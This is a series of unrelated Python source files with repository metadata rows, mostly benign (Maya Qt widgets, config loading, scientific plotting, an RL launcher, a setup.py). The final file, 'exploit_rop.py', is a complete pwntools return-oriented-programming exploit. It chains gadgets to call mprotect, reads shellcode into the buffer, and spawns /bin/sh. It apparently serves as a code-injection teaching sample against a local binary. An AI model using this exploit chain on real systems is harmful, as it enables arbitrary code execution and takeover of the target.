"MIT"
] | 32 | 2020-10-09T10:49:45.000Z | 2022-03-31T08:27:37.000Z | """mGear Qt custom widgets"""
from mgear.vendor.Qt import QtCore, QtWidgets, QtGui
import maya.OpenMaya as api
#################################################
# CUSTOM WIDGETS
#################################################
class TableWidgetDragRows(QtWidgets.QTableWidget):
"""qTableWidget with drag and drop functionality"""
def __init__(self, *args, **kwargs):
super(TableWidgetDragRows, self).__init__(*args, **kwargs)
self.setDragEnabled(True)
self.setAcceptDrops(True)
self.viewport().setAcceptDrops(True)
self.setDragDropOverwriteMode(False)
self.setDropIndicatorShown(True)
self.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
def dropEvent(self, event):
if not event.isAccepted() and event.source() == self:
drop_row = self.drop_on(event)
rows = sorted(set(item.row() for item in self.selectedItems()))
rows_to_move = [[QtWidgets.QTableWidgetItem(
self.item(row_index, column_index))
for column_index in range(self.columnCount())]
for row_index in rows]
for row_index in reversed(rows):
self.removeRow(row_index)
if row_index < drop_row:
drop_row -= 1
for row_index, data in enumerate(rows_to_move):
row_index += drop_row
self.insertRow(row_index)
for column_index, column_data in enumerate(data):
self.setItem(row_index, column_index, column_data)
event.accept()
for row_index in range(len(rows_to_move)):
for column_index in range(self.columnCount()):
self.item(drop_row + row_index,
column_index).setSelected(True)
def drop_on(self, event):
index = self.indexAt(event.pos())
if not index.isValid():
return self.rowCount()
return index.row() + 1 if self.is_below(event.pos(),
index) else index.row()
def is_below(self, pos, index):
rect = self.visualRect(index)
margin = 2
if pos.y() - rect.top() < margin:
return False
elif rect.bottom() - pos.y() < margin:
return True
return rect.contains(pos, True) \
and not (int(self.model().flags(index))
& QtCore.Qt.ItemIsDropEnabled) \
and pos.y() >= rect.center().y()
def getSelectedRowsFast(self):
selRows = []
for item in self.selectedItems():
if item.row() not in selRows:
selRows.append(item.row())
return selRows
def droppingOnItself(self, event, index):
dropAction = event.dropAction()
if self.dragDropMode() == QtWidgets.QAbstractItemView.InternalMove:
dropAction = QtCore.Qt.MoveAction
if (event.source() == self
and event.possibleActions() & QtCore.Qt.MoveAction
and dropAction == QtCore.Qt.MoveAction):
selectedIndexes = self.selectedIndexes()
child = index
while child.isValid() and child != self.rootIndex():
if child in selectedIndexes:
return True
child = child.parent()
return False
def dropOn(self, event):
if event.isAccepted():
return False, None, None, None
index = QtWidgets.QModelIndex()
row = -1
col = -1
if self.viewport().rect().contains(event.pos()):
index = self.indexAt(event.pos())
if (not index.isValid()
or not self.visualRect(index).contains(event.pos())):
index = self.rootIndex()
if self.model().supportedDropActions() & event.dropAction():
if index != self.rootIndex():
dropIndicatorPosition = self.position(event.pos(),
self.visualRect(index),
index)
qabw = QtWidgets.QAbstractItemView
if dropIndicatorPosition == qabw.AboveItem:
row = index.row()
col = index.column()
elif dropIndicatorPosition == qabw.BelowItem:
row = index.row() + 1
col = index.column()
else:
row = index.row()
col = index.column()
if not self.droppingOnItself(event, index):
return True, row, col, index
return False, None, None, None
def position(self, pos, rect, index):
r = QtWidgets.QAbstractItemView.OnViewport
margin = 5
if pos.y() - rect.top() < margin:
r = QtWidgets.QAbstractItemView.AboveItem
elif rect.bottom() - pos.y() < margin:
r = QtWidgets.QAbstractItemView.BelowItem
elif rect.contains(pos, True):
r = QtWidgets.QAbstractItemView.OnItem
if (r == QtWidgets.QAbstractItemView.OnItem
and not (self.model().flags(index)
& QtCore.Qt.ItemIsDropEnabled)):
if pos.y() < rect.center().y():
r = QtWidgets.QAbstractItemView.AboveItem
else:
r = QtWidgets.QAbstractItemView.BelowItem
return r
######################################
# drag and drop QListView to Maya view
######################################
def selectFromScreenApi(x, y, x_rect=None, y_rect=None):
"""Find the object under the cursor on Maya view
found here: http://nathanhorne.com/maya-python-selectfromscreen/
Thanks Nathan!
Args:
x (int): rectable selection start x
y (int): rectagle selection start y
x_rect (int, optional): rectable selection end x
y_rect (int, optional): rectagle selection end y
Returns:
list of str: Name of the objects under the cursor
"""
# get current selection
sel = api.MSelectionList()
api.MGlobal.getActiveSelectionList(sel)
# select from screen
if x_rect is not None and y_rect is not None:
api.MGlobal.selectFromScreen(
x, y, x_rect, y_rect, api.MGlobal.kReplaceList)
else:
api.MGlobal.selectFromScreen(x, y, api.MGlobal.kReplaceList)
objects = api.MSelectionList()
api.MGlobal.getActiveSelectionList(objects)
# restore selection
api.MGlobal.setActiveSelectionList(sel, api.MGlobal.kReplaceList)
# return the objects as strings
fromScreen = []
objects.getSelectionStrings(fromScreen)
return fromScreen
class DragQListView(QtWidgets.QListView):
"""QListView with basic drop functionality
Attributes:
exp (int): Extend the mouse position to a rectable
theAction (func): function triggered when drop
"""
def __init__(self, parent):
super(DragQListView, self).__init__(parent)
self.setDragEnabled(True)
self.setAcceptDrops(False)
self.setDropIndicatorShown(True)
self.setAlternatingRowColors(True)
self.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.setDefaultDropAction(QtCore.Qt.CopyAction)
self.exp = 3
self.ignore_self = True
def mouseMoveEvent(self, event):
mimeData = QtCore.QMimeData()
mimeData.setText('%d,%d' % (event.x(), event.y()))
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
drag.setHotSpot(event.pos())
dropAction = drag.start(QtCore.Qt.MoveAction)
if not dropAction == QtCore.Qt.MoveAction:
pos = QtGui.QCursor.pos()
widget = QtWidgets.QApplication.widgetAt(pos)
if self.ignore_self and (
widget is self
or widget.objectName() == "qt_scrollarea_viewport"):
return
relpos = widget.mapFromGlobal(pos)
# need to invert Y axis
invY = widget.frameSize().height() - relpos.y()
sel = selectFromScreenApi(relpos.x() - self.exp,
invY - self.exp,
relpos.x() + self.exp,
invY + self.exp)
self.doAction(sel)
def setAction(self, action):
self.theAction = action
def doAction(self, sel):
self.theAction(sel)
| 35.514286 | 77 | 0.565682 | 864 | 8,701 | 5.625 | 0.24537 | 0.023045 | 0.038889 | 0.011728 | 0.186626 | 0.088066 | 0.060082 | 0.016872 | 0.016872 | 0 | 0 | 0.001353 | 0.320308 | 8,701 | 244 | 78 | 35.659836 | 0.820426 | 0.089185 | 0 | 0.166667 | 0 | 0 | 0.003522 | 0.00287 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077381 | false | 0 | 0.011905 | 0 | 0.184524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c20ef34dbe36314044cb7fcf862111c08ab5497 | 2,989 | py | Python | configuration.py | aurphillus/Certificate-Edit | d4c1e534dc4abbfcaf77262aab5283a72bf9a63e | [
"MIT"
] | null | null | null | configuration.py | aurphillus/Certificate-Edit | d4c1e534dc4abbfcaf77262aab5283a72bf9a63e | [
"MIT"
] | null | null | null | configuration.py | aurphillus/Certificate-Edit | d4c1e534dc4abbfcaf77262aab5283a72bf9a63e | [
"MIT"
] | null | null | null | import configparser
import os
def create_config():
default_path = os.getcwd()
config = configparser.ConfigParser()
config['PATH'] = {
"parentdirectory": default_path,
}
config ['EXTENSIONS'] = {
"acceptedextensions": 'jpeg,png,jpg'
}
config['DIRECTORY'] = {
"input": "injest",
"output": "output",
"log": "logs",
"default": "default",
}
config['IMAGE'] = {
'basewidth': 1276,
'defaultbackground': 'transparent.png',
'defaultbackgroundlink':'https://pasteboard.co/JiXOlCH.png'
}
config['LOG'] = {
'filename': 'log.txt'
}
with open("config.ini","w") as configfile:
config.write(configfile)
def load_config():
if os.path.exists("config.ini"):
config = configparser.ConfigParser()
config.read("config.ini")
# Checking config
try:
if config['PATH']['parentdirectory'] and config['EXTENSIONS']['acceptedextensions'] and config['DIRECTORY']['input'] and config['DIRECTORY']['output'] and config['DIRECTORY']['log'] and config['IMAGE']['basewidth'] and config['IMAGE']['defaultbackground'] and config['DIRECTORY']['DEFAULT'] and config['IMAGE']['defaultbackgroundlink'] and config['LOG']['filename']:
config={
'parentdirectory': config['PATH']['parentdirectory'],
'extensions': config['EXTENSIONS']['acceptedextensions'].split(','),
'input_directory': config['DIRECTORY']['input'],
'output_directory': config['DIRECTORY']['output'],
'logs_directory': config['DIRECTORY']['log'],
'basewidth': config['IMAGE']['basewidth'],
'transparentbackground': config['IMAGE']['defaultbackground'],
'default_directory': config['DIRECTORY']['default'],
'defaultbackgroundlink': config['IMAGE']['defaultbackgroundlink'],
'logfile': config['LOG']['filename']
}
return config
else:
print(f"#. Problem with config file.")
print(f"#. Resetting config file.")
if os.path.exists("config.ini"):
os.remove("config.ini")
print(f"#. Generating new default config file")
create_config()
load_config()
except Exception as e:
print(f"#. Problem with config file.")
print(f"#. Resetting config file.")
if os.path.exists("config.ini"):
os.remove("config.ini")
print(f"#. Generating new default config file")
create_config()
load_config()
else:
print(f"#. Creating new config file.")
print(f"#. Generating new default config file")
create_config()
load_config()
| 39.853333 | 378 | 0.535296 | 257 | 2,989 | 6.171206 | 0.249027 | 0.08512 | 0.045397 | 0.026482 | 0.240227 | 0.240227 | 0.225725 | 0.225725 | 0.225725 | 0.225725 | 0 | 0.001952 | 0.314486 | 2,989 | 74 | 379 | 40.391892 | 0.772084 | 0.005018 | 0 | 0.328358 | 0 | 0 | 0.352545 | 0.035389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.029851 | 0 | 0.074627 | 0.119403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c21c741d82fa74f710995093499f55871ed220f | 481 | py | Python | tests/unit/preprocessor/_derive/test_lai_grid.py | Peter9192/ESMValCore | febd96a39480cc837afbf4e1f5b0ef61571af76a | [
"Apache-2.0"
] | null | null | null | tests/unit/preprocessor/_derive/test_lai_grid.py | Peter9192/ESMValCore | febd96a39480cc837afbf4e1f5b0ef61571af76a | [
"Apache-2.0"
] | null | null | null | tests/unit/preprocessor/_derive/test_lai_grid.py | Peter9192/ESMValCore | febd96a39480cc837afbf4e1f5b0ef61571af76a | [
"Apache-2.0"
] | null | null | null | """Test derivation of `lai_grid`."""
import mock
import esmvalcore.preprocessor._derive.lai_grid as lai_grid
CUBES = 'mocked cubes'
STD_NAME = 'leaf_area_index'
@mock.patch.object(lai_grid, 'grid_area_correction', autospec=True)
def test_lai_grid_calculation(mock_grid_area_correction):
"""Test calculation of `lai_grid."""
derived_var = lai_grid.DerivedVariable()
derived_var.calculate(CUBES)
mock_grid_area_correction.assert_called_once_with(CUBES, STD_NAME)
| 30.0625 | 70 | 0.787942 | 68 | 481 | 5.176471 | 0.485294 | 0.139205 | 0.153409 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 481 | 15 | 71 | 32.066667 | 0.820513 | 0.126819 | 0 | 0 | 0 | 0 | 0.114914 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c21f6f7f129be11973a59130ba1d0c9a5694b3f | 4,390 | py | Python | transform_mesh.py | yinguobing/image_utility | 17726335d2ce64a3b799dc0b7416f40ff928f805 | [
"MIT"
] | 69 | 2018-02-08T11:54:20.000Z | 2021-12-08T09:39:06.000Z | transform_mesh.py | yinguobing/image_utility | 17726335d2ce64a3b799dc0b7416f40ff928f805 | [
"MIT"
] | 9 | 2018-10-22T10:38:37.000Z | 2021-09-10T18:37:32.000Z | transform_mesh.py | yinguobing/image_utility | 17726335d2ce64a3b799dc0b7416f40ff928f805 | [
"MIT"
] | 47 | 2018-03-21T05:10:52.000Z | 2022-03-04T03:41:48.000Z | import cv2
import json
import numpy as np
from matplotlib import pyplot
image_file = "/home/robin/Desktop/sample/helen-trainset-1010057391_1.jpg"
ibug_file = "/home/robin/Desktop/sample/helen-trainset-1010057391_1.json"
mesh_file = "/home/robin/Desktop/sample/helen-trainset-1010057391_1_m468.json"
epn_width = 20
def get_distance(point1, point2):
"""Calculate the distance between two points."""
return np.linalg.norm(point2 - point1)
def get_angle(vector2, vector1):
"""Return the angel between two vectors."""
d = np.dot(vector1, vector2)
cos_angle = d / (np.linalg.norm(vector1) * np.linalg.norm(vector2))
if cos_angle > 1.0:
angle = 0
elif cos_angle < -1.0:
angle = np.pi
else:
angle = np.arccos(cos_angle)
return angle
def rotate(points, radius, center):
"""Rotate the points by angle"""
_points = points - np.array(center, np.float)
cos_angle = np.cos(radius)
sin_angle = np.sin(radius)
rotaion_matrix = np.array([[cos_angle, sin_angle],
[-sin_angle, cos_angle]])
return np.dot(_points, rotaion_matrix) + center
if __name__ == "__main__":
# Read in the image.
image = pyplot.imread(image_file)
# Read in the IBUG marks.
with open(ibug_file, 'r') as f:
data = json.load(f)
ibug_points = np.reshape(data, (-1, 2)) * 128
# Read in the MESH points.
with open(mesh_file, 'r') as f:
data = json.load(f)
mesh_points = np.reshape(data, (-1, 3)) * (128 + epn_width * 2)
# The IBUG data are manually annotated, which I believe could be used to
# calibrate the mesh points. Here are some points of interest that is more
# stable than others. They are:
# * left eye left corner
# * left eye right corner
# * right eye left corner
# * right eye right corner
# * mouse left corner
# * mouse right corner
anchor_points_ibug = np.array([ibug_points[36],
ibug_points[39],
ibug_points[42],
ibug_points[45],
ibug_points[48],
ibug_points[54]], np.float32)
anchor_points_mesh = np.array([mesh_points[33],
mesh_points[133],
mesh_points[362],
mesh_points[263],
mesh_points[78],
mesh_points[308]], np.float32)
# The mesh are of 3D dimensions.
anchor_points_mesh = anchor_points_mesh[:, :2]
mesh_to_transform = mesh_points[:, :2]
# TODO: transform the mesh points.
# 1. scale
scale = 0.5
mesh_transformed = mesh_to_transform * scale
# 2. translation
# 3. rotation
# Draw IBUG marks.
fig_ibug = pyplot.figure()
ibug_plot = fig_ibug.add_subplot(111)
ibug_plot.imshow(image)
ibug_lines = ibug_plot.plot(ibug_points[:, 0], ibug_points[:, 1],
color='yellow', marker='.',
linestyle='None', markersize=6)
ibug_plot.plot(anchor_points_ibug[:, 0], anchor_points_ibug[:, 1],
color='blue', marker='.',
linestyle='None', markersize=6)
# Draw mesh marks.
fig_mesh = pyplot.figure()
mesh_plot = fig_mesh.add_subplot(111)
image = cv2.copyMakeBorder(image,
epn_width, epn_width, epn_width, epn_width,
cv2.BORDER_CONSTANT, value=[0, 0, 0])
mesh_plot.imshow(image)
mesh_lines = mesh_plot.plot(mesh_points[:, 0], mesh_points[:, 1],
color='yellow', marker='.',
linestyle='None', markersize=3)
mesh_plot.plot(anchor_points_mesh[:, 0], anchor_points_mesh[:, 1],
color='blue', marker='.',
linestyle='None', markersize=6)
# Draw transformed mesh.
fig_mesh = pyplot.figure()
t_mesh_plot = fig_mesh.add_subplot(111)
t_mesh_plot.imshow(image)
t_mesh_lines = t_mesh_plot.plot(mesh_transformed[:, 0], mesh_transformed[:, 1],
color='yellow', marker='.',
linestyle='None', markersize=3)
pyplot.show()
| 34.84127 | 83 | 0.56492 | 536 | 4,390 | 4.421642 | 0.281716 | 0.054852 | 0.033755 | 0.061181 | 0.243038 | 0.21308 | 0.199578 | 0.175949 | 0.100422 | 0 | 0 | 0.045118 | 0.323462 | 4,390 | 125 | 84 | 35.12 | 0.752862 | 0.146697 | 0 | 0.177215 | 0 | 0 | 0.065212 | 0.048774 | 0 | 0 | 0 | 0.008 | 0 | 1 | 0.037975 | false | 0 | 0.050633 | 0 | 0.126582 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c22a331581c5541b0a0b652eb8d6141c491cf4b | 4,970 | py | Python | plot/plot_dm_profiles.py | diamondjems016/galaxy_analysis | fa1367085a6b9870de2546daf3163aaa41129ea0 | [
"MIT"
] | 1 | 2021-01-15T15:33:05.000Z | 2021-01-15T15:33:05.000Z | plot/plot_dm_profiles.py | diamondjems016/galaxy_analysis | fa1367085a6b9870de2546daf3163aaa41129ea0 | [
"MIT"
] | null | null | null | plot/plot_dm_profiles.py | diamondjems016/galaxy_analysis | fa1367085a6b9870de2546daf3163aaa41129ea0 | [
"MIT"
] | 1 | 2020-11-29T00:15:25.000Z | 2020-11-29T00:15:25.000Z | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rc
#
from dwarfs.analysis.initial_conditions import ic_list as icl
from galaxy_analysis.plot.plot_styles import *
colors = [orange, magenta, purple, black]
ls = ['-','-','-','-']
#
# Get the 4 Leo P galaxy IC's
#
run11_largebox = icl.ic_object_dict['Leo_P']
run11_2rs = icl.ic_object_dict['Leo_P_2rs']
run11_30km = icl.ic_object_dict['Leo_P_30km']
run11_40km = icl.ic_object_dict['Leo_P_40km']
galaxies = [run11_largebox, run11_2rs, run11_30km, run11_40km]
labels = ['17', '25', '30', '40']
for i in np.arange(len(labels)):
labels[i] = r'v$_{\rm c,max}$ = ' + labels[i] + r' km s$^{-1}$'
print(labels)
def overplot_radius(ax, gal, color = 'black', ls = '--',
virial = False, rtype = 'b'):
if virial:
norm = gal.ic['R200']
else:
norm = icl.cgs.kpc
ylim = ax.get_ylim()
x = [ gal.ic[rtype] / norm, gal.ic[rtype] / norm ]
ax.plot(x, ylim, lw = line_width*0.75, color = color, ls = ls)
ax.set_ylim(ylim)
return
def plot_dm_profiles(virial = False, dm_unit = 1.0):
#
# Plot dark matter density as a function of radius
#
fig, ax = plt.subplots()
if virial:
r = np.logspace(-4, 0) # in virial radius
else:
r = np.logspace(-3,2)
ax.loglog()
for i,g in enumerate(galaxies):
if virial:
x = r * g.ic['R200']
else:
x = r * icl.cgs.kpc
ax.plot( r, g.DM_density(x) * dm_unit,
lw = line_width, color = colors[i], ls = ls[i],
label = labels[i])
# for i,g in enumerate(galaxies):
# overplot_scale_radius(ax, g, color = colors[i], ls = '--', virial = virial)
#ax.set_xlim(-4, 0)
#ax.set_ylim()
if virial:
ax.set_xlabel(r'log[R / R$_{\rm vir}$]')
else:
ax.set_xlabel(r'R (kpc)')
ax.legend(loc = 'best')
if dm_unit == 1.0:
outname = 'dark_matter_density'
ax.set_ylabel(r'Dark Matter Density (g cm$^{-3}$)')
else:
ax.set_xlim(0.01,40)
ax.set_ylim(1.0E3, 6.0E8)
ax.set_ylabel(r'Dark Matter Density (M$_{\odot}$ kpc$^{-3}$)')
outname = 'dark_matter_density_Msun_kpc'
for i,g in enumerate(galaxies):
overplot_radius(ax, g, color = colors[i], ls = '--', virial = virial)
overplot_radius(ax, g, color = colors[i], ls = '--', virial = virial, rtype = 'R200')
fig.set_size_inches(8,8)
plt.tight_layout()
if virial:
outname += '_virial'
plt.savefig(outname +'.png')
return
def plot_mass_profiles(virial):
fig, ax = plt.subplots()
if virial:
r = np.logspace(-4, 0) # in virial radius
else:
r = np.logspace(-3,2)
ax.loglog()
for i,g in enumerate(galaxies):
if virial:
x = r * g.ic['R200']
else:
x = r * icl.cgs.kpc
ax.plot( r, g.M_r(x) / icl.cgs.Msun,
lw = line_width, color = colors[i], ls = ls[i],
label = labels[i])
for i, g in enumerate(galaxies):
overplot_radius(ax, g, color = colors[i], ls = '--', virial = virial)
#ax.set_xlim(-4, 0)
#ax.set_ylim()
if virial:
ax.set_xlabel(r'log[R / R$_{\rm vir}$]')
else:
ax.set_xlabel(r'R (kpc)')
ax.set_ylabel(r'Cumulative Mass (M$_{\odot}$)')
ax.legend(loc = 'best')
fig.set_size_inches(8,8)
plt.tight_layout()
outname = 'dark_matter_mass'
if virial:
outname += '_virial'
plt.savefig(outname + '.png')
return
def plot_circular_velocity_profiles(virial):
fig, ax = plt.subplots()
if virial:
r = np.logspace(-4, 0) # in virial radius
else:
r = np.logspace(-3,2)
ax.loglog()
for i,g in enumerate(galaxies):
if virial:
x = r * g.ic['R200']
else:
x = r * icl.cgs.kpc
ax.plot( r, g.circular_velocity(x) / 1.0E5,
lw = line_width, color = colors[i], ls = ls[i],
label = labels[i])
for i,g in enumerate(galaxies):
overplot_radius(ax, g, color = colors[i], ls = '--',
virial = virial)
#ax.set_xlim(-4, 0)
#ax.set_ylim()
if virial:
ax.set_xlabel(r'log[R / R$_{\rm vir}$]')
else:
ax.set_xlabel(r'R (kpc)')
ax.set_xlim(0.01,40.0)
ax.set_ylabel(r'V$_{\rm c}$ (km s$^{-1}$)')
ax.legend(loc = 'best')
fig.set_size_inches(8,8)
plt.tight_layout()
outname = 'circular_velocity'
if virial:
outname += '_virial'
plt.savefig(outname + '.png')
return
if __name__ == '__main__':
for virial in [True, False]:
plot_dm_profiles(virial)
plot_dm_profiles(virial, dm_unit = icl.cgs.kpc**3 / icl.cgs.Msun)
plot_mass_profiles(virial)
plot_circular_velocity_profiles(virial)
| 24.482759 | 93 | 0.551107 | 723 | 4,970 | 3.625173 | 0.183956 | 0.038153 | 0.036627 | 0.042732 | 0.611599 | 0.592522 | 0.55475 | 0.532621 | 0.532621 | 0.50248 | 0 | 0.03166 | 0.294567 | 4,970 | 202 | 94 | 24.60396 | 0.715916 | 0.068008 | 0 | 0.613636 | 0 | 0 | 0.100369 | 0.00607 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.037879 | 0 | 0.098485 | 0.007576 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c23f513292b5a4c00b4d1b74cca6e4b7ac22835 | 1,199 | py | Python | main.py | jendelel/rhl-algs | d5b8779d7e271265d4f0bfcb3602bc56958e3eb3 | [
"Apache-2.0"
] | 2 | 2019-03-30T23:29:10.000Z | 2019-04-05T21:54:21.000Z | main.py | jendelel/rhl-algs | d5b8779d7e271265d4f0bfcb3602bc56958e3eb3 | [
"Apache-2.0"
] | 3 | 2019-03-29T11:23:17.000Z | 2020-12-28T02:00:17.000Z | main.py | jendelel/rhl-algs | d5b8779d7e271265d4f0bfcb3602bc56958e3eb3 | [
"Apache-2.0"
] | null | null | null | import argparse
import functools
from ui import MainWindow, create_app
import time
from gym_utils import make_env, toggle_recording
running = False
def startRl(window):
global running
if running:
return
running = True
parser = argparse.ArgumentParser(description='Reinforcement human learning')
parser.add_argument('--alg', type=str, default="random_alg", help='Name of RL algorithm.')
parser.add_argument('--env', type=str, default="CartPole-v0", help='Name of Gym environment.')
parser.add_argument('--seed', type=int, default=543, help='random seed (default: 543)')
alg, args = window.loadAlg(parser)
env = make_env(args.env, window.viewer, alg_name=args.alg, record=window.recordCheck.isChecked())
window.recordCheck.stateChanged.connect(functools.partial(toggle_recording, env_object=env))
print(args)
env.seed(args.seed)
window.viewer.start_time = time.time()
alg.start(window, args, env)
running = True
def main():
app = create_app()
window = MainWindow()
window.startBut.clicked.connect(functools.partial(startRl, window=window))
window.show()
app.exec_()
if __name__ == "__main__":
main()
| 29.243902 | 101 | 0.711426 | 154 | 1,199 | 5.38961 | 0.422078 | 0.03253 | 0.061446 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006979 | 0.16347 | 1,199 | 40 | 102 | 29.975 | 0.820538 | 0 | 0 | 0.064516 | 0 | 0 | 0.1201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.16129 | 0 | 0.258065 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c2bb6940e12c9d5333e4245d234d46a912ce462 | 628 | py | Python | setup.py | leftstache/repeat-cli | b959b549f7aeb8c512f67d32a95c303ff384b229 | [
"Apache-2.0"
] | null | null | null | setup.py | leftstache/repeat-cli | b959b549f7aeb8c512f67d32a95c303ff384b229 | [
"Apache-2.0"
] | null | null | null | setup.py | leftstache/repeat-cli | b959b549f7aeb8c512f67d32a95c303ff384b229 | [
"Apache-2.0"
] | null | null | null | import os
from distutils.core import setup
def get_packages(root_dir):
packages = []
for root, dirs, files in os.walk(root_dir):
if "__init__.py" in files:
packages.append(root.replace('/', '.'))
return packages
setup(
name='repeat-cli',
version='1.0.1',
author='Joel Johnson',
author_email='joelj@joelj.com',
packages=['repeat_cli'],
scripts=['repeat'],
data_files=['README.md'],
url='https://github.com/leftstache/repeat',
license='Apache 2.0',
description='Repeats a command',
long_description=open('README.md').read(),
install_requires=[]
) | 24.153846 | 51 | 0.633758 | 80 | 628 | 4.825 | 0.675 | 0.036269 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00996 | 0.200637 | 628 | 26 | 52 | 24.153846 | 0.758964 | 0 | 0 | 0 | 0 | 0 | 0.241653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c2bcc7e5deb8f99d5bb937671a2d4a737486da5 | 2,116 | py | Python | golang-code-injection/exploit_rop.py | tamilmaran-7/samples | ba52f06fa7bcf3da88d833eba677624ee253999a | [
"Apache-2.0"
] | 1 | 2022-03-15T07:20:59.000Z | 2022-03-15T07:20:59.000Z | golang-code-injection/exploit_rop.py | tamilmaran-7/samples | ba52f06fa7bcf3da88d833eba677624ee253999a | [
"Apache-2.0"
] | null | null | null | golang-code-injection/exploit_rop.py | tamilmaran-7/samples | ba52f06fa7bcf3da88d833eba677624ee253999a | [
"Apache-2.0"
] | 4 | 2022-02-07T06:42:32.000Z | 2022-03-17T07:30:10.000Z | #!/usr/bin/env python2
from pwn import *
import sys
GDB_MODE = len(sys.argv) > 1 and sys.argv[1] == '--gdb'
if not GDB_MODE:
c = process("./main")
# gadgets (use ropper to find them)
eax0 = 0x0000000000462fa0 # mov eax, 0; ret;
syscall = 0x0000000000464609 # syscall; ret;
poprax = 0x000000000040ebef # pop rax; or dh, dh; ret;
poprsi = 0x000000000041694f # pop rsi; adc al, 0xf6; ret;
poprdi = 0x000000000040ffbd # pop rdi; dec dword ptr [rax + 0x21]; ret;
poprdx = 0x0000000000467815 #pop rdx; xor ah, byte ptr [rsi - 9]; ret;
# addresses
buf = 0x00541000 # use vmmap in GDB to find it
dummy = 0x00557000 # heap
# syscall nums
mprotect = 0xa
read = 0x0
# put it together
# padding
payload = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN"
# mark memory page at buf rwx
payload += p64(poprax) # dec dword ptr in poprdi mitigation
payload += p64(dummy)
payload += p64(poprdi) # 1ST ARGUMENT
payload += p64(buf) # ADDRESS
payload += p64(poprsi) # xor ah, byte ptr in poprdx mitigation
payload += p64(dummy)
payload += p64(poprdx) # 3RD ARGUMENT
payload += p64(0x7) # RWX
payload += p64(poprsi) # 2ND ARGUMENT
payload += p64(0x100) # SIZE
payload += p64(poprax) # SET RAX = 0
payload += p64(0xa) # SET RAX = 10
payload += p64(syscall) # SYSCALL
# read into buf
payload += p64(poprax) # dec dword ptr in poprdi mitigation
payload += p64(dummy)
payload += p64(poprdi) # 1ST ARGUMENT
payload += p64(0x0) # STDIN
payload += p64(poprsi) # xor ah, byte ptr in poprdx mitigation
payload += p64(dummy)
payload += p64(poprdx) # 3RD ARGUMENT
payload += p64(0x100) # SIZE
payload += p64(poprsi) # 2ND ARGUMENT
payload += p64(buf) # ADDRESS
payload += p64(eax0) # SET RAX = 0
payload += p64(syscall) # SYSCALL
# jump into buf
payload += p64(buf)
# machine instructions to spawn /bin/sh
# http://shell-storm.org/shellcode/files/shellcode-806.php
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# send it
if GDB_MODE:
print(payload + shellcode)
else:
c.sendline(payload)
c.sendline(shellcode)
c.interactive()
